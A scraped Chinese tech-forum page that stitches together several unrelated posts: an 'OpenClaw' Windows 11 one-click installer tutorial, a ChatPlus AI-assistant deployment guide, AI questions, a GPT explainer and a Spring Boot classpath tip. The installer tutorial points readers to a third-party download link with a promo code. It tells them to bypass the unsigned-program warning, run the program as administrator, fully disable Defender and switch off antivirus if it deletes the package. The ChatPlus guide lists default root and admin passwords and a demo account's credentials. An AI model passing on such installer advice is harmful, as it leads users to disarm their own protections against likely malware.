四、第二步:正确解压文件(Win11 必看操作)Win11 自带的解压工具偶尔会出现文件丢失、权限不足的问题,建议使用 WinRAR / 7-Zip(基础免费版本即可)进行解压,具体步骤:一键部署包 v2.6.0 下载地址:https://openclaw.ikidi.top/api/download/package/14?promoCode=IV9D9D5198DC1. 右键点击下载好的压缩包2. 选择【解压到当前文件夹】3. 解压完成后将得到名为 Openclaw-win 的文件夹✅ 解压完成后,在文件夹内可看到带有红色龙虾图标的可执行文件:Openclaw Windows 一键启动.exe 五、第三步:运行一键启动程序(Win11 拦截问题解决)Windows 11 会自动拦截未签名的程序,遇到拦截时按以下步骤放行即可正常运行:1. 双击 Openclaw Windows 一键启动.exe2. 系统弹出 “Windows 已保护你的电脑” 提示框3. 点击提示框中的【更多信息】4. 继续点击【仍要运行】完成以上步骤后,即可正常启动安装程序。 六、第四步:自动安装与初始化(全程无需手动操作)程序启动后进入欢迎界面,点击【开始使用】即可进入下一步设置安装路径(Win11 部署关键步骤)核心要求:必须使用纯英文安装路径,路径中不能包含中文、空格、特殊符号!✅ 推荐安装路径:D:\OpenClawE:\AI\OpenClaw❌ 禁止使用安装路径:D:\ 软件 \OpenClawD:\ 小龙虾C:\Program Files\OpenClaw路径设置完成后,点击【开始安装】,安装程序将自动完成以下操作: · 检测 Win11 系统运行环境· 安装工具运行所需依赖· 部署 OpenClaw 核心服务· 自动配置系统对应权限· 创建桌面快捷方式此过程需等待 3~5 分钟,期间请勿关闭安装窗口! 七、第五步:启动成功 & 快速使用指南安装完成后,程序将自动打开 OpenClaw 主界面,当看到界面右上角显示「Gateway 在线」,即代表部署成功!部署成功后可直接向 AI 发送各类操作指令,示例如下:· 帮我整理 D 盘下载文件夹的图片· 打开浏览器搜索 2026 AI 智能体趋势并将结果保存为表格· 帮我批量归类桌面文件· 帮我检查电脑垃圾文件并进行清理发送指令后,AI 将自动执行对应操作,全程无需人工干预! 八、Windows 11 专属常见问题(收藏备用)1. 安装过程中提示 “权限不足”解决方法:右键点击一键启动程序,选择【以管理员身份运行】2. 主界面 Gateway 一直显示离线解决方法:· 检查 Defender 是否完全关闭· 核对安装路径是否为纯英文格式· 关闭程序后重新启动一键启动程序1. 程序启动速度特别慢说明:Win11 系统下第一次启动 OpenClaw 需要完成初始化操作,等待 1~3 分钟均属于正常现象2. AI 无法实现鼠标控制 / 文件读写操作解决方法:开启 Win11 对应系统权限,以管理员身份运行 OpenClaw3. 部署包文件被杀毒软件删除解决方法:关闭杀毒软件 → 重新解压压缩包 → 重新运行安装程序 九、写在最后OpenClaw 是一款真正能实现自动化办公、自动完成电脑操作的本地 AI 工具,在 Windows 11 系统中运行流畅、稳定,且全程本地运行无隐私泄露风险。本次教程所用的一键部署包为 Windows 11 专属优化版,无广告、无捆绑,适配个人办公、日常操作自动化、工作效率提升等各类使用场景。OpenClaw Windows 11 一键部署包 v2.6.0 下载地址:https://openclaw.ikidi.top/api/download/package/14?promoCode=IV9D9D5198DC
-
如果说chatgpt让大模型成了“通才”,alphafold让ai成了“专家”,那么接下来的ai该往哪儿走?
-
一直说AI要代替人类,可GPT火了这么久了,Agent也面世许久了,为啥还只是能作为人类的工具不能完全代替人类?
-
方案介绍随着人工智能技术的不断发展和普及,越来越多的企业和个人开始关注和使用AI助手来提高工作效率和生活便利性。该解决方案基于 AI 大语言模型 API 实现的 AI 助手全套开源解决方案,自带运营管理后台,开箱即用。集成了 OpenAI, Azure, ChatGLM,讯飞星火,文心一言等多个平台的大语言模型。集成了 MidJourney 和 Stable Diffusion AI绘画、音乐生成功能。开始使用步骤 1 访问该促销活动购买页面,按照如下配置完成ChatPlus服务器的部署。(为避免网络波动影响导致方案部署失败,请选择2M带宽。)步骤 2 登录弹性云服务器控制台。选择购买的服务器,单击服务器名称进入详细页面,在新页面单击“安全组”。步骤 3 单击“配置规则”,选择“入方向规则”。步骤 4 按下图所示,修改放通8080端口。步骤 5 登录弹性云服务器控制台。选择购买的服务器,按如下图所示单击复制按钮,获取弹性公网IP地址。使用Linux连接工具登录服务器,或者在控制台单击“远程登录”。步骤6 等待20分钟左右,登录用户名:root,初始密码:a123456789. ,方案部署完成后请重置密码,进入服务器后,查看环境部署日志。输入命令:tail -f /tmp/install_docker_chatplus.log,如下图所示则表示基础环境部署成功(使用Ctrl+C按键即可退出查看日志界面)。步骤 6 打开浏览器,输入http://EIP:8080/admin,进入ChatPlus 管理界面,初始用户名:admin ,初始密码:admin123,单击“登录”。步骤 7 初次使用需要添加API KEY,按下图所示单击“API-KEY”新增添加聊天/绘画的API KEY。步骤 8 按下图所示,依次选择所属平台,填写名称,选择用途,按照页面提示填写API-KEY信息,激活启用状态,单击提交。步骤 9 打开浏览器,输入http://EIP:8080/chat,进入ChatPlus 前端界面,初始使用需要登录,输入体验账号:18575670125 密码:12345678。,单击“登录”(移动端登录会自动适配)。步骤 10 按下图所示,选择后端API类型并单击确定,在下面的对话框中,输入对话内容,单击发送按钮,即可获取对话结果。更多玩法项目地址Github 地址:cid:link_2码云地址:cid:link_3详细使用教程:cid:link_4
-
写一个chatgpt 安卓应用会被下架吗,需要满足什么条件才能不被下架?
-
GPT与传统NLP技术的区别GPT和传统NLP的区别主要体现在功能、应用场景、模型结构和技术等方面。首先,GPT旨在构建自然语言处理系统,而传统NLP则广泛用于各种实际场景中,如自动翻译、智能客服和智能搜索等。GPT更专注于生成自然流畅的文本,比如对话生成和文本摘要等。其次,GPT使用了Transformer模型,该结构采用了多头自注意力机制和残差连接等技术,可以有效地处理长文本输入,并学习到不同层次的语言表示。而传统的NLP模型通常使用基于词向量的表示方法,不能很好地处理长文本输入。Transformer模型是一种基于自注意力机制的深度学习模型,它由Google AI Language团队在2017年首次提出,并被广泛应用于自然语言处理(NLP)领域。Transformer模型主要由编码器和解码器组成,其中编码器用于对输入序列进行编码,解码器则基于编码器得到的表示向量来生成输出序列。Transformer模型的特点在于使用了自注意力机制,这种机制可以自动学习输入序列中不同位置之间的关系,从而更好地捕捉输入序列中的语义信息。此外,Transformer模型还使用了残差连接和多头自注意力机制等技术,这些技术可以帮助模型更好地处理长文本输入和不同层次的语言表示。由于Transformer模型在大规模语料库上进行了预训练,因此它能够很好地适应不同的自然语言处理任务,比如文本分类、文本生成、机器翻译等。此外,Transformer模型还可以通过微调来适应特定的任务,从而具有更广泛的应用价值。此外,GPT使用了大规模的语料库作为训练数据,在预训练阶段学习了大量的语言知识和规律,从而在后续任务中更好地适应和表达。而传统的NLP模型通常需要针对每个任务进行手工特征工程和模型设计,无法很好地处理不同的任务。最后,GPT采用了基于自回归模型的训练方式,即在预测下一个词时将前面所有的词作为已知条件进行预测。这种方法可以更好地捕捉文本中的语义信息,提高模型的性能。而传统的NLP模型通常采用基于词袋模型的训练方法,无法很好地捕捉文本中的语义信息。GPT大火的原因GPT之所以会火,是因为它采用了先进的深度学习技术和大规模的训练数据,可以更好地处理自然语言任务,比如文本分类、文本生成和问答系统等。此外,GPT还可以通过微调模型来适应不同的任务,从而具有更广泛的应用价值。另外,GPT的开源性和可扩展性也为它的广泛应用提供了便利。GPT与传统人工智能助手对比小米的小爱同学和苹果Siri都是人工智能语音助手,它们很早就有了。而ChatGPT是今年才出现的,却后来者居上。这是因为ChatGPT是一种更先进的自然语言处理技术,在处理自然语言任务方面比小爱同学和苹果Siri更厉害。首先,ChatGPT是一种基于Transformer模型的深度学习算法,它可以在大规模语料库上进行预训练,从而学习到自然语言的语法、语义和上下文信息。这种算法可以处理长文本输入,并捕捉文本中的语义信息,因此在文本分类、问答系统、对话生成等自然语言处理任务中表现优异。相比之下,小爱同学和苹果Siri是基于传统的语音识别和自然语言理解技术,它们主要针对语音交互进行优化,而不是针对文本处理。虽然它们可以完成一些简单的任务,如设置提醒、查询天气等,但它们在处理复杂的自然语言任务时往往不如ChatGPT表现得那么出色。另外,ChatGPT的强大之处还在于它可以生成高质量的自然语言文本。通过使用Transformer模型,ChatGPT可以生成流畅、连贯的文本,从而更好地满足用户的需求。这种能力使得ChatGPT在智能客服、聊天机器人、问答系统等领域具有广泛的应用前景。虽然小爱同学和苹果Siri都是优秀的人工智能语音助手,但ChatGPT在自然语言处理方面表现得更强大和先进,慢慢的也会吸收gpt的思想,变成更先进的人工智能产物。
-
随着chatgpt的发展,显然chatgpt3.5已有局限性,4.0又要收费,以后会不会改变
-
一、简介 classpath类路径在 Spring Boot 中既指程序在打包前的/java/目录加上/resource目录,也指程序在打包后生成的/classes/目录。两者实际上指的是同一个目录,里面包含的文件内容一模一样。 二、获取classpath路径 以下两种方式均可,但是并不能用于生产环境,因为当我们把程序打成jar包时,由于jar包本质是压缩文件,无法被直接打包,所以生成的路径中会含有感叹号!导致路径定位错误,例如:jar!/BOOT-INF/classes!/application.yml (No such file or directory) // 方式一: String path1 = ClassUtils.getDefaultClassLoader().getResource("").getPath(); // 方式二: String path2 = ResourceUtils.getURL("classpath:").getPath(); 此时,如果我们想要读取jar包内的文件,可以采取第 3 种方式不读取路径、直接读取文件流: // 方式 三 InputStream input = ClassUtils .getDefaultClassLoader() .getResourceAsStream("application.yml"); Reader reader = new InputStreamReader(input, "UTF-8"); 三、获取项目路径 上面介绍了如何获取classpath路径之后,其实有时候我们会发现自己只想获取当前程序所在路径或jar包所在路径,那么此时又应该如何获取呢? // 方式一: File file = new File("."); File path1 = file.getAbsoluteFile(); // 方式二: String path2 = System.getProperty("user.dir"); 两者方式并无优劣之分,具体使用哪种取决于你的爱好~ ———————————————— 版权声明:本文为CSDN博主「ThinkStu」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/qq_35760825/article/details/128727663
-
ChatGPT已经上岗做大学生作业辅导、问答博主、科普博主、智能客服...当然更出圈的是让人啼笑皆非的答复,听说有新媒体公司用chatGPT写文案,写一篇毙掉一篇。我相信,以ChatGPT目前的迭代速度,缓解“人性化”的问题指日可待,但始终缺乏人性和个性,反而对“人工”“润色”的需求有增无减。那么,如何对其输出进行品控?人工测评还是语言学分析抑或更多学科交叉?当前是否能够开发这样的软件?
推荐直播
-
华为云码道 × 仓颉编程:工程化AI编码探索2026/05/27 周三 19:00-21:00
刘俊杰-华为云仓颉语言专家/李炎-华为云码道技术专家/王智鹏-OpenCangjie开源社区发起人
本场直播围绕华为云仓颉语言与华为云码道的深度结合,展示华为云智能编程从零基础到高效落地的完整生态能力。以华为云码道为引擎,仓颉语言为载体,带给大家日常提效、趣味创新到极速量产的开发体验。
回顾中 -
一个AI团队帮你写代码:华为云码道Agent Space实战2026/06/25 周四 19:00-21:00
张翰文-华为云码道工程师/郭英旭-青软创新科技集团股份有限公司 软件架构师
本场直播聚焦华为云码道Agent Space两大模式:研发办公、代码开发,亲身体验从需求到代码的AI自动化能力。实操演示基于华为 CodeArts CLI,依托 OpenSpec 规格体系从零搭建业务项目。
回顾中
热门标签